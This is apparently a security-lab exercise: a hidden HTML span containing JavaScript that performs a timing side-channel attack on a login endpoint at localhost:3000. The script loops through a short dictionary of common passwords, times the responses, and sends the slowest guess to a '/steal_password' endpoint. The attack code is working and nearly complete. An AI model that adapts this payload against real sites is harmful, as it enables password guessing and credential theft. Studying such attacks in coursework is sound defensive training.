<span style='display:none'>
    <img id='test'/>
    <script>
      var dictionary = [`password`, `123456`, `	12345678`, `dragon`, `1234`, `qwerty`, `12345`];
      var index = 0;
      var maxtime = 0;
      var guess;
      var test = document.getElementById(`test`);
      test.onerror = () => {
        var end = new Date();
  
        /* >>>> HINT: you might want to replace this line with something else. */
        console.log(`Time elapsed ${end-start}`);
        console.log(`${dictionary[index-1]}`);
        if ((end-start) > maxtime)
        {
            maxtime = end-start;
            guess = dictionary[index-1];
        }
        /* <<<<< */
  
        start = new Date();
        if (index < dictionary.length) {
          /* >>>> TODO: replace string with login GET request */
          test.src = `http://localhost:3000/get_login?username=userx&password=${dictionary[index]}`;
          /* <<<< */
        } else {
          /* >>>> TODO: analyze server's reponse times to guess the password for userx and send your guess to the server <<<<< */
            var xhr = new XMLHttpRequest();
            xhr.open(`GET`, `http://localhost:3000/steal_password?password=${guess}&timeElapsed=${maxtime}`);
            xhr.send();
        }
        index += 1;
      };
      var start = new Date();
      /* >>>> TODO: replace string with login GET request */
      test.src = `http://localhost:3000/get_login?username=userx&password=${dictionary[index]}`;
      /* <<<< */
      index += 1;
    </script>
  </span>
 